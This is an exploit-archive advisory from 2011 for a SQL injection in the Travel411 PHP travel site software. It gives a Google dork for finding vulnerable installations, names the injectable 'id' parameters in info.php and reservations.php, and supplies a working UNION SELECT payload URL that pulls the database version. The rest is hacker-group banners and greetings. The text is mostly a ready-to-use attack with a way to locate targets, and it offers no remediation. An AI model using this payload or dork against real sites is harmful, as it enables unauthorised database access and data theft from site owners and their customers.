Travel411 - SQL Injection

EDB-ID:

17236

CVE:

N/A


Author:

Caddy-Dz

Type:

webapps


Platform:

PHP

Date:

2011-05-02


=====================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 

 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
     \/      \/|__|                                          \/ 
 
			Exploit-ID is the Indonesian Exploit Archive
 
Web             : exploit-id.com	

e-mail          : root[at]exploit-id.com               

            	   	 #########################################			  
		  	    Caddy-Dz , member of exploit-id.com				

		  	 #########################################			  
======================================================================
####
# Exploit Title: Travel411 SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com
# Category:: webapps
# Google dork: intext:"Powered by Travel411.com"
# Tested on: [Windows Vista Edition Intégrale]
# Vendor: http://www.travel411.com/
####

||>> Special Greets To: jos_ali_joe & Exploit-Id Team + All Others

[*] ## ExPLo!T:

||>> Find Any File Like (info.php?id=) or (reservations.php?id=)

#  http://127.0.0.1/info.php?id=SQLI

#  http://127.0.0.1/info.php?id=-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

###


===================================================================================================
# Greets To : 
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , Exploit-Id Team , (exploit-id.com)
  All My Friends:  T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , RmZ ...others
===================================================================================================